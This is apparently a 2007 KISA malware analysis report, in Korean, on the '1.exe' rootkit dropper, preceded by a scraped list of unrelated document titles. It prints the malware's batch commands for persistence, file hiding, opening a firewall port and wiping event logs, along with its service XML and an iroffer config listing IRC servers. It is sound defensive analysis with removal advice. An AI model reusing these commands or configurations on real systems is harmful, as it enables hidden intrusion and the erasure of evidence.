untitled

Similar documents
*2008년1월호진짜

Microsoft Word - ntasFrameBuilderInstallGuide2.5.doc

ActFax 4.31 Local Privilege Escalation Exploit

1) 인증서만들기 ssl]# cat > // 설명 : 발급받은인증서 / 개인키파일을한파일로저장합니다. ( 저장방법 : cat [ 개인키

1) 인증서만들기 ssl]# cat > // 설명 : 발급받은인증서 / 개인키파일을한파일로저장합니다. ( 저장방법 : cat [ 개인키

소프트웨어설치 1. 소프트웨어설치및제거 ( 소스코드 ) 소스코드컴파일을이용한 S/W 설치 1. 소스코드다운로드 - 예 ) httpd tar.gz - 압축해제 : #tar xzvf httpd tar.gz - INSTALL 또는 README파일참조

Windows Server 2012

Windows 8에서 BioStar 1 설치하기

System Recovery 사용자 매뉴얼

< FBBE7B0EDB3EBC6AE5FB5F0C6FAC6AEC6D0BDBABFF6B5E5C3EBBEE0C1A128BCF6C1A4292E687770>

메일서버등록제(SPF) 인증기능적용안내서 (HP-UX - qmail) OS Mail Server SPF 적용모듈 (Perl 기반) 작성기준 HP-UX 11.11i qmail 1.03 spf-filter 년 6 월

작성자 : 기술지원부 김 삼 수

bn2019_2

1. What is AX1 AX1 Program은 WIZnet 사의 Hardwired TCP/IP Chip인 iinchip 들의성능평가및 Test를위해제작된 Windows 기반의 PC Program이다. AX1은 Internet을통해 iinchip Evaluation

JDK이클립스

<BBE7B0EDB3EBC6AE5FC7E3BAEAB0D4C0D32E687770>

PowerPoint 프레젠테이션

Sena Device Server Serial/IP TM Version

ISP and CodeVisionAVR C Compiler.hwp

Microsoft Word - windows server 2003 수동설치_non pro support_.doc

1. Windows 설치 (Client 설치 ) 원하는위치에다운받은발송클라이언트압축파일을해제합니다. Step 2. /conf/config.xml 파일수정 conf 폴더에서 config.xml 파일을텍스트에디터를이용하여 Open 합니다. config.xml 파일에서, 아

Microsoft PowerPoint Android-SDK설치.HelloAndroid(1.0h).pptx

USB USB DV25 DV25 REC SRN-475S REC SRN-475S LAN POWER LAN POWER Quick Network Setup Guide xdsl/cable Modem PC DVR 1~3 1.. DVR DVR IP xdsl Cable xdsl C

Secure Programming Lecture1 : Introduction

<41736D6C6F D20B9AEBCADBEE7BDC42E687770>

Windows Server NTP 설정가이드 Author 이종하 (lovemind.tistory.com) 1

SSL Strip Attack JAC (SemiDntmd) 이우승 semidntmd.tistory.com

Microsoft PowerPoint - chap01-C언어개요.pptx

<4D F736F F D D31312D30312D53572D30312DBBE7BFEBC0DABCB3B8EDBCAD5FBFDCBACEB9E8C6F7BFEB2E646F63>

PWR PWR HDD HDD USB USB Quick Network Setup Guide xdsl/cable Modem PC DVR 1~3 1.. DVR DVR IP xdsl Cable xdsl Cable PC PC DDNS (

Red Alert Malware Report

슬라이드 1

Microsoft PowerPoint - 02_Linux_Fedora_Core_8_Vmware_Installation [호환 모드]

Assign an IP Address and Access the Video Stream - Installation Guide

Interstage5 SOAP서비스 설정 가이드

vm-웨어-앞부속

Spotlight on Oracle V10.x 트라이얼프로그램설치가이드 DELL SOFTWARE KOREA

Mango-IMX6Q mfgtool을 이용한 이미지 Write하기

UDP Flooding Attack 공격과 방어

PowerPoint 프레젠테이션

BEA_WebLogic.hwp

Studuino소프트웨어 설치

아래 항목은 최신( ) 이미지를 모두 제대로 설치하였을 때를 가정한다

[ 악성코드상세분석보고서 ] SK 커뮤니케이션즈해킹관련상세분석보고서 nateon.exe 대응 2 팀

메일서버등록제(SPF) 인증기능적용안내서 (AIX - sendmail) OS Mail Server SPF 적용모듈 (Perl 기반) 작성기준 AIX 5.3 sendmail spf-filter 년 6 월

Copyright 2012, Oracle and/or its affiliates. All rights reserved.,.,,,,,,,,,,,,.,...,. U.S. GOVERNMENT END USERS. Oracle programs, including any oper

CODESYS 런타임 설치과정

hlogin2

chapter4

SQL Developer Connect to TimesTen 유니원아이앤씨 DB 기술지원팀 2010 년 07 월 28 일 문서정보 프로젝트명 SQL Developer Connect to TimesTen 서브시스템명 버전 1.0 문서명 작성일 작성자

서비스) 와서버( 관리대상서버) 간에자격증명을사용하여서로의 ID 를확인하고서로주고받는데이터를검사하고암호화하는프로세스 이다. 높은인증수준은일반적으로성능의저하를가져올수있지만높은 수준의보안과데이터무결성을제공한다. 기본값 - 관리대상서버에설정되어있는 DCOM 인증수준기본 값을

Oracle hacking 작성자 : 임동현 작성일 2008 년 10 월 11 일 ~ 2008 년 10 월 19 일 신규작성 작성내용

ORANGE FOR ORACLE V4.0 INSTALLATION GUIDE (Online Upgrade) ORANGE CONFIGURATION ADMIN O

Microsoft Word - src.doc

- 목차 - Q1. 어떤 Windows 운영체제가취약점에영향을받나요? 1 Q2. 해당랜섬웨어를예방하기위해서는어떻게해야하나요? 1 Q3. SMB 포트는어떻게차단하나요? 1 Q4. 보안패치는어떻게하나요? 3 Q5. 보안패치가됐는지어떻게확인하나요? 5 Q6. 스마트폰도랜섬웨

< 목차 > Ⅰ. 개요 3 Ⅱ. 실시간스팸차단리스트 (RBL) ( 간편설정 ) 4 1. 메일서버 (Exchange Server 2007) 설정변경 4 2. 스팸차단테스트 10

TTA Journal No.157_서체변경.indd

Microsoft PowerPoint - 10Àå.ppt

untitled

PowerPoint 프레젠테이션

행자부 G4C

1217 WebTrafMon II

Snort Install Manual Ad2m VMware libnet tar.gz DebianOS libpcap tar.gz Putty snort tar.gz WinSCP snort rules 1. 첫번째로네트워크설정 1) ifconf

Microsoft Word - poc_script1.doc

- 목차 - Q1. 어떤 Windows 운영체제가취약점에영향을받나요? 1 Q2. 해당랜섬웨어를예방하기위해서는어떻게해야하나요? 1 Q3. SMB 포트는어떻게차단하나요? 1 Q4. 운영체제의버전확인은어떻게확인하나요? 3 Q5. 보안패치는어떻게하나요? 4 Q6. 보안패치가됐

4S 1차년도 평가 발표자료

Microsoft PowerPoint - 11주차_Android_GoogleMap.ppt [호환 모드]

The Pocket Guide to TCP/IP Sockets: C Version

토익S-채용사례리플렛0404

- 목차 - 1. 서버에서실행되는서비스확인 2. 원격접속 (SSH) 보안설정 3. /tmp 디렉터리보안설정 4. iptable 설정 / hosts.allow & hosts.deny 설정 5. 시스템파일변조체크 문서작성간에테스트된환경 - CentOS bit -

No

단계

07_alman.hwp

악성코드분석보고서 (Lucci.exe) 작성자 : 김진태 1

08_spam.hwp

메일서버등록제(SPF) 인증기능적용안내서 (HP-UX - postfix) OS Mail Server SPF 적용모듈 (Perl 기반) 작성기준 HP-UX 11.11i postfix spf-filter 년 6 월

server name>/arcgis/rest/services server name>/<web adaptor name>/rest/services ArcGIS 10.1 for Server System requirements - 지

목차 1. 개요 배경 파일정보 상세분석 SMB 취약점공격흐름 특징적인행위 대응

목차 1. 제품 소개 특징 개요 Function table 기능 소개 Copy Compare Copy & Compare Erase

Network Security - Wired Sniffing 실습 ICNS Lab. Kyung Hee University

DE1-SoC Board

FD¾ØÅÍÇÁ¶óÀÌÁî(Àå¹Ù²Þ)-ÀÛ¾÷Áß

Network seminar.key

PowerPoint Presentation

Remote UI Guide

#WI DNS DDoS 공격악성코드분석

MOD360: Microsoft Virtualization 360A Panel Discussion on Microsoft’s Virtualization Strategy

본문서는 초급자들을 대상으로 최대한 쉽게 작성하였습니다. 본문서에서는 설치방법만 기술했으며 자세한 설정방법은 검색을 통하시기 바랍니다. 1. 설치개요 워드프레스는 블로그 형태의 홈페이지를 빠르게 만들수 있게 해 주는 프로그램입니다. 다양한 기능을 하는 플러그인과 디자인

PowerPoint 프레젠테이션

PowerPoint 프레젠테이션

망고100 보드로 놀아보자-4

Microsoft PowerPoint SDK설치.HelloAndroid(1.5h).pptx

untitled

PowerPoint 프레젠테이션

Tomcat.hwp

목차 윈도우드라이버 1. 매뉴얼안내 운영체제 (OS) 환경 윈도우드라이버준비 윈도우드라이버설치 Windows XP/Server 2003 에서설치 Serial 또는 Parallel 포트의경우.

Contents Test Lab 홖경... 3 Windows 2008 R2 서버를도메인멤버서버로추가... 4 기존 Windows 2003 AD 홖경에서 Windows 2008 R2 AD 홖경으로업그레이드를위한사젂작업 7 기존 Windows 2003 AD의스키마확장...

목차 BUG offline replicator 에서유효하지않은로그를읽을경우비정상종료할수있다... 3 BUG 각 partition 이서로다른 tablespace 를가지고, column type 이 CLOB 이며, 해당 table 을 truncate

ìœ€íŁ´IP( _0219).xlsx

슬라이드 1

Transcription:

2007. 1. 본보고서의전부나일부를인용시반드시 [ 자료 : 한국정보보호진흥원 (KISA)] 를명시하여주시기바랍니다.

1. 개요 최근윈도우즈해킹동향은공격에성공한후시스템에다운로드된악성프로그램 (Bot, 백도어등 ) 파일및실행된악성네트워크 / 프로세스정보를숨기기위해루트킷이연동되고있다. 한국정보보호진흥원 ( 이하 KISA ) 은국내봇C&C서버활동을탐지하던중동일한패턴을나타내는시스템을여럿감지하였다. 서버들을분석한결과동일한증상을보였고 1.exe( 윈도우 2000) 라는프로그램을통해데이터다운로더, 커널루트킷, 서비스등록관련프로그램이실행되는것으로확인이되었다. 본고에서는이번에발견한 1.exe 루트킷프로그램의특징과조사내용을정리하였다. 2. 루트킷조사 1) 전체개요 1.exe 실행순서를종합구성해보면아래와같다. ( 그림 1) 전체개요도 - 1 -

2) 1.exe 조사 첫번째로조사한 1.exe 의특징은다음과같다. - 압축 : "instyler ex-it! Self-Extractor" - 기능 : RECYCLER 디렉터리에관련파일들압축해제 config.exe를실행하여악성프로그램세팅및실행 - 관련파일 : 그림 2 1.exe의압축해제참조 1.exe 바이너리는모든악성프로그램들을압축된형태로지니고있고압축해제후 config.exe를통하여악성프로그램들을시스템에등록 / 실행하게된다. C:\RECYCLER 는관리가소홀하고디렉터리속성이디폴트로운영체제파일로지정되어있어관리자의눈을피할수있다. 아래그림과같이 C:\RECYCLER에관련파일들을압축해제한다. ( 그림 2) 1.exe 의압축해제 관련파일들압축해제가끝나면 ShellExecute 함수를통해아래그림과같이 config.exe를실행하게된다. - 2 -

( 그림 3) config.exe 실행 3) config.exe 조사 config.exe 특징은다음과같다. - 압축 : 없음 - 기능 : 악성프로그램들을실행하는배치파일을생성하고실행 - 관련파일 : c:\documents~1\kisa\locals~1\temp\bt0312.bat config.exe 바이너리를디버거를통하여확인한결과 c:\documents~1\kisa\locals~1\temp\bt0312.bat 배치파일을생성한다. 또한아래그림과같이 CreateProcess함수로 cmd 명령어를이용 bt0312.bat 파일을실행한다. ( 그림 4) bt0312.bat 실행 - 3 -

bt0312.bat 파일의스크립트는다음과같은순서로악성프로그램들을순차적으로 시스템에등록및실행하게된다. 1 mkdir "C:\Recycler\S-1-5-21-3127...\_restore.." C:\Recycler 는보호되는운영체제디렉터리로탐색기의도구-옵션에서관련부분을체크해서확인하지않는이상생성되는루트킷홈디렉터리를찾기가쉽지않다. 생성되는디렉터리명 : "C:\Recycler\S-1-5-21-3127994617-2291869382-1739915505-1006\_restore{DIWJDS7S-C329-32 42-91EC-D2SD72C70D82}\ 2 move C:\recycler\msprexe.exe "C:\Recycler\S-1-5-21-3127...\_restore.." 모든프로그램및파일들을앞서생성한루트킷홈디렉터리로이동시킨다. 3 C:\recycler\dtreg.exe -AddKey "\HKLM\SOFTWARE\Sublime Solutions\TaskDaemon" 레지스트리를등록하는 dtreg.exe 프로그램을이용해서 taskdaemon 프로그램을레지스트리에등록시킨다. 4 taskdaemon.exe -i DirIndex.xml taskdaemon.exe -i ProfileMgr.xml 서비스등록프로그램인 taskdaemon을이용 logongui.exe를 DirIndex 서비스명으로등록하고 msprexe.exe를 ProfileMgr 서비스명으로등록한다. 5 C:\recycler\control.exe control.exe 실행 4] control.exe 조사 특징은다음과같다. - 압축 : PECompact 2.x - 기능 : 악성프로그램들을실행하는배치파일을생성하고실행 - 관련파일 : C:\Documents~1\kisa\Locals~1\Temp\bt4607.bat control.exe 바이너리를디버거를통하여확인한결과 - 4 -

c:\documents~1\kisa\locals~1\temp\bt4607.bat 배치파일을생성한다. 또한아래 그림같이 CreateProcess함수로 cmd 명령어를이용 bt4607.bat 파일을실행한다. ( 그림 5) bt4607.bat 실행 bt4607.bat 파일의스크립트는다음과같은순서로악성프로그램들을순차적으로시스템에등록및실행하게된다. 1 move C:\recycler\config.exe "C:\Recycler\S-1-5-21-3127...\_restore.." move C:\recycler\control.exe "C:\Recycler\S-1-5-21-3127...\_restore.." 루트킷프로그램들을세팅하고실행했던 config와 control 파일을루트킷홈디렉터리로이동시킨다. 2 rename control.exe system.ocx rename config.exe settings.ocx 2개의루트킷제어프로그램파일명을변경해놓는다. 3 attrib +s +h C:\Recycler\* /S /D 관리자눈에쉽게띄지않도록디렉터리와파일들속성을숨김 (Hidden)/ 시스템 (System) 으로변경한다. 4 NetSec.exe 커널루트킷모듈을로딩하고제어하는프로그램실행 ( 자세한내용은 NetSec.exe에서설명 ) 5 net start ProfileMgr net start DirIndex - 5 -

logongui.exe, msprexe.exe를실행하는서비스를시작한다. 6 fclear.exe all 현재까지발생했던이벤트로그를모두삭제한다. 5) NetSec.exe 조사 특징은다음과같다. - 압축 : PECompact 2.x - 기능 : 커널루트킷모듈로딩및제어, 서비스등록, 레지스트리등록 - 관련파일 : netsec.sys NetSec 프로그램은봇 C&C 서버가사용하는포트를클라이언트들이접속할수있도록아래와같은 netsh firewall 명령어를통해방화벽을오픈한다. "%cmd%?/c netsh firewall add portopening protocol = TCP port = 27397 name = "Automatic Updates" mode = ENABLE scope = ALL profile = ALL" 이후 NetSecManager라는서비스등록을위해관련된레지스트리등록을하고아래그림처럼 CreateService 함수를통해 NetSec.exe를실행하는 NetSecManager 서비스를등록한다. ( 그림 6) NetSecManager 서비스등록 서비스등록후곧바로 StartService 함수를통해 NetSecManager 서비스를실행해 NetSec.exe를다시실행하게된다. NetSec.sys 모듈을생성해커널에로딩하고아래와같은레지스트리에 sys 파일을등록한다. - 6 -

HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\NetSecDriver 커널루트킷은 API 함수들을후킹하여원하는파일 / 프로세스 / 네트워크정보들을감추게되는데디버깅을통해다음과같은문자열을정보들을확인할수있었다. 하지만인코딩되어저장되어있는문자열정보들이있어숨겨진문자열들은더많을것으로예상할수있다. 00406865 mov edx, NetSec.00407A14 ASCII "[HIDDEN TABLE]" 00406926 sub ebx, NetSec.00413EBC ASCII "_restore{diwjds7s-c329-3242-91ec-d2sd72c70d82}" 00406932 mov ebx, NetSec.00423EBC ASCII "NetSec.exe" 0040699D mov edx, NetSec.00407A2C ASCII "[HIDDEN PROCESSES]" 00406A5E sub ebx, NetSec.00423EBC ASCII "NetSec.exe" 00406A6A mov ebx, NetSec.00433EBC ASCII "TASKDAEMON*" 00406AD5 mov edx, NetSec.00407A48 ASCII "[ROOT PROCESSES]" 00406BB2 sub ebx, NetSec.00433EBC ASCII "TASKDAEMON*" 00406BBE mov ebx, NetSec.00443EBC ASCII "DIRINDEX" 00406D19 sub ebx, NetSec.00443EBC ASCII "DIRINDEX" 00406D25 mov ebx, NetSec.00453EBC ASCII "DIRINDEX" 00406D90 mov edx, NetSec.00407A64 ASCII "[HIDDEN REGKEYS]" 00406F27 sub ebx, NetSec.00453EBC ASCII "DIRINDEX" 00406F9E mov edx, NetSec.00407A80 ASCII "[HIDDEN REGVALUES]" 0040706B mov ebx, NetSec.00473EBC ASCII " Device HarddiskVolume1*" 004070D6 mov edx, NetSec.00407A9C ASCII "[FREE SPACE]" 00407149 push NetSec.00407AB4 ASCII ". " 00407315 sub ebx, NetSec.00473EBC ASCII " Device HarddiskVolume1*" 00407436 mov eax, NetSec.00407ADC ASCII "TCPI:" 0040744D mov eax, NetSec.00407AEC ASCII "TCPO:" 00407466 mov eax, NetSec.00407AFC ASCII "UDP:" 6) taskdaemon.exe 조사 특징은다음과같다. - 압축 : PECompact 2.x - 기능 : xml을이용한서비스등록프로그램 - 관련파일 : taskdaemonrt.dll libxml2.dll taskdaemon.dtd DirIndex.xml ProfileMgr.xml - 7 -

taskdaemon은 xml을이용해서비스를등록하는프로그램이다. bt0312.bat 배치스 크립트에서수행하는명령어를확인해보면 taskdaemon.exe -i DirIndex.xml 명령어로 -i 인스톨옵션을통해서아래 DirIndex.xml, ProfileMgr.xml에정의되어있는 logongui.exe, msprexe.exe 프로그램을실행하는서비스를등록시킨다. 실행모드를 Automatic" 으로설정해시스템이재부팅되더라도재시작되도록설정한다. - DirIndex.xml 서비스명 : DirIndex 실행프로그램 : logongui.exe 실행모드 : "Automatic" <?xml version="1.0" encoding="utf-8" standalone="no"?> <!DOCTYPE Service SYSTEM "taskdaemon.dtd"> <Service> <Program> <Name>DirIndex</Name> <DisplayName>Directory Index Manager</DisplayName> <DisplayNamePrefix></DisplayNamePrefix> <Description>Directory indexing service for file integrity management.</description> <WorkingDir>C:\Recycler\S-1-5-21-3127994617-2291869382-1739915505-1006\_restore{DIWJDS7S-C329-3242-91EC- D2SD72C70D82}\com1\RP00</WorkingDir> <Executable>C:\Recycler\S-1-5-21-3127994617-2291869382-1739915505-1006\_restore{DIWJDS7S-C329-3242-91EC- D2SD72C70D82}\com1\RP00\logongui.exe</Executable> </Program> <Options> <AffinityMask>0</AffinityMask> <Priority>0</Priority> <EventLogging>false</EventLogging> <InteractWithDesktop>false</InteractWithDesktop> <PreLaunchDelay>0</PreLaunchDelay> <StartUpMode>1</StartUpMode> <UponExit>1</UponExit> <ShutdownDelay>5000</ShutdownDelay> <ShowWindow>0</ShowWindow> <JobType>1</JobType> </Options> </Service> - 8 -

- ProfileMgr.xml 내용 서비스명 : ProfileMgr 실행프로그램 : msprexe.exe 실행모드 : "Automatic" <?xml version="1.0" encoding="utf-8" standalone="no"?> <!DOCTYPE Service SYSTEM "taskdaemon.dtd"> <Service> <Program> <Name>ProfileMgr</Name> <DisplayName>Profile Manager</DisplayName> <DisplayNamePrefix></DisplayNamePrefix> <Description>Assembles information about your system for various system utilities such as Control Pannel and My Computer.</Description> <WorkingDir>C:\Recycler\S-1-5-21-3127994617-2291869382-1739915505-1006\_restore{DIWJDS7S-C329-3242-91EC- D2SD72C70D82}\com1\RP00</WorkingDir> <Executable>C:\Recycler\S-1-5-21-3127994617-2291869382-1739915505-1006\_restore{DIWJDS7S-C329-3242-91EC- D2SD72C70D82}\com1\RP00\msprexe.exe</Executable> <Parameters>dhtml.c.dll</Parameters> <Delay>5000</Delay> <ConsoleApp>false</ConsoleApp> <ForceReplace>true</ForceReplace> </Program> <Options> <AffinityMask>0</AffinityMask> <Priority>0</Priority> <EventLogging>false</EventLogging> <InteractWithDesktop>false</InteractWithDesktop> <PreLaunchDelay>0</PreLaunchDelay> <StartUpMode>1</StartUpMode> <UponExit>1</UponExit> <ShutdownDelay>5000</ShutdownDelay> <ShowWindow>0</ShowWindow> <JobType>1</JobType> </Options> </Service> 8) logingui.exe 조사 특징은다음과같다. - 압축 : 없음 - 기능 : ServU FTP 서버프로그램, 43958 포트를통해서비스 - 관련파일 : - 9 -

libeay32.dll ssleay32.dll wbemup32.dll wmspdscore.dll winservices.dll ( 설정파일 ) WindowsStartFnc.dll ( 로그파일 ) logongui.exe 프로그램은포트 43958번을이용한 ServU FTP 서버프로그램이다. 위의관련파일에서 libeay32.dll, ssleay32.dll을제외한나머지 DLL파일들은실제라이브러리파일이아니고일반텍스트파일을확장자만 dll로생성시켜놓은것들이다. winservices.dll 파일은 ftp 환경설정파일이고 WindowsStartFnc.dll은로그파일이다. 나머지 2개파일은암호화키등록파일들이다. - winservices.dll [GLOBAL] Version=5.0.0.0 ProcessID=1720 - WindowsStartFnc.dll Tue 26Sep06 09:19:34 - SrvFTP FTP Server v5.0 (5.0.0.0) - Copyright (c) 1995-2004 Cat Soft, All Rights Reserved - by Rob Beckers Tue 26Sep06 09:19:34 - Cat Soft is an affiliate of Rhino Software, Inc. Tue 26Sep06 09:19:34 - Using WinSock 2.0 - max. 32767 sockets Tue 26Sep06 09:19:35 - PROBLEM: Unable to load the SSL certificate (file SERVUCERT.CRT) - No SSL support Tue 26Sep06 09:19:35 - FTP Server listening on port number 43958, IP 127.0.0.1 Tue 26Sep06 09:19:35 - Valid registration key found 9) msprexe.exe 조사 특징은다음과같다. - 압축 : UPX 0.89.6-1.02 - 기능 : iroffer 프로그램, IRC 사용자들에게파일제공및데이터전송 - 관련파일 : cygcrypt-0.dll cygwin1.dll MSVCP60.dll dhtml.c.dll ( 상태로그파일 ) - 10 -

winhlp.dll ( 환경설정파일 ) msprexe.exe는 iroffer 프로그램명을변경한바이너리로 TCP/UDP 포트를이용해서 IRC 클라이언트들에게데이터를제공해준다. msprexe.exe 프로그램을실행하면 winhlp.dll 파일이생성되고이파일은 DLL과상관없는 iroffer 로그파일이다. 실행된후 dhtml.c.dll 환경설정파일을통해 IRC 서버에접속을시도하고접속이되면관련된세팅값으로채널에등록한다. - winhlp.dll IRFR ꠑ ꠑ Liroffer v1.3.b09 [20040823145936], CYGWIN_NT-5.0 1.5.12(0.116/4/2) 또하나의 DLL 파일이존재하는데 dhtml.c.dll은환경설정파일로세팅에필요한정보들이존재한다. - dhtml.c.dll statefile winhlp.dll logstats no logrotate none logfile winlog.dll connectionmethod direct server alldramairc.esylum.net 55493 server alldramairc.esylum.net 65535 server alldramairc.esylum.net 1100 server irc.esylum.net 6667 server irc.esylum.net 6669 server irc.esylum.net 1200 server alldramairc.esylum.net server Prynix.esylum.net server Buyashell.esylum.net server fire-com.esylum.net server xplycyt.esylum.net server 420.esylum.net server BSDAxis.esylum.net server 66.207.166.20 server 66.252.29.237 server 72.20.27.54 server 64.18.148.188 server 66.29.46.17 server 66.207.166.19 channel #esy-tzt -plist 30 user_realname XdCc user_modes +ix loginname WaReZ nickserv_pass h4x3d - 11 -

slotsmax 3 queuesize 100 maxtransfersperperson 1 maxqueueditemsperperson 1 restrictlist yes restrictprivlist yes restrictprivlistmsg Negative Sir restrictsend yes downloadhost *!*@* creditline ꠓꠗ4,1(?? 만.-ꠗ0,1> ꠗ4,1?ꠗ0,1 EsYluM ꠗ4,1?ꠗ0,1<ꠗ4,1-. 만. 럽? adminhost *hijacked*!*@*.* adminhost *b00*!*@*.* adminhost *meemaw*!*@*.* adminhost *phastman*!*@*.* adminpass AA.RJwBCGdzkA uploadhost [esylum]-*!*@* uploadhost [EsYluM]-*!*@* uploadmaxsize 0 hideos timestampconsole quietmode notifytime 30 nomd5sum filedir c:\recycler\s-1-5-21-3127994617-2291869382-1739915505-1006\_restore{diwjds7s-c329-3242-91ec-d2sd72c70d82}\com2\rp00\ uploaddir c:\recycler\s-1-5-21-3127994617-2291869382-1739915505-1006\_restore{diwjds7s-c329-3242-91ec-d2sd72c70d82}\com2\rp00\ user_nick [Esylum]-NV-16313 9) fclear.exe, dtreg.exe 조사 flcear.exe - 압축 : UPX 0.89.6-1.02 / 1.05-1.24 - 기능 : 이벤트로그삭제프로그램 fclear.exe는 ClearEventLog 프로그램명을변경한바이너리로이벤트로그를삭제하는데사용된다. all 옵션을통해모든로그를제거하며 fclear를옵션없이실행한화면은아래와같다. - 12 -

( 그림 7) fclar.exe 실행화면 dtreg.exe - 압축 : PECompact 2.x - 기능 : 레지스트리등록프로그램 TaskDaemon 프로그램을레지스트리에등록하는데사용되며이후바로삭제된다. 3. 결론및대책 조사결과 1.exe는피해시스템에설치할악성프로그램들을숨기기위해시스템폴더인 C:\RECYLER 폴더하위에실제이름과유사한시스템폴더를생성하였고이후관련악성프로그램들을그폴더로압축해제시킨후하나씩악성프로그램들을실행하였다. 실행된악성프로그램들은자신들의홈디렉터리및포트, 봇 C&C 프로그램, IRC 클라이언트프로그램등의정보를숨겨관리자가쉽게발견하지못하도록하였다. 1.exe 루트킷프로그램을탐지를못하는백신제품들이있어서버관리자들이악성프로그램들의설치여부를확인하지못하고있었다. 이후윈도우 XP 시스템에서도 1.exe 변종인 esyp4.exe를발견했지만이름만변경되었을뿐똑같은기능을하였다. 커널루트킷실행으로관련루트킷프로그램정보들을찾아내기가쉽지가않기때문에공개용커널루트킷탐지프로그램인 IceSword 도구를이용해관련프로그램들의홈디렉터리, 프로세스, 포트정보, 서비스, 레지스트리를찾아내서모두제거해주어야한다. 아래그림은커널루트킷실행서비스인 NetSecManger를찾은후서비스중지및제거해주는화면이다. - 13 -

( 그림 8) 커널루트킷제거 루트킷 1.exe가설치된봇C&C서버피해시스템들은관리자들이소홀하기쉬운개발용서버나자주이용하지않는시스템으로보안패치의미적용, 서버보안설정미실시등으로인해피해를입었다. 또한, 자주사용하지않다보니시스템이악용이되고있는상태에서도이를쉽게발견하지못하였다. 시스템담당자들은본사고사례와같은피해를줄이기위해윈도우자동업데이트기능을반드시사용할것을권장하며, 특히관리의손이미치지않은방치된시스템이없는지확인할필요가있다. - 14 -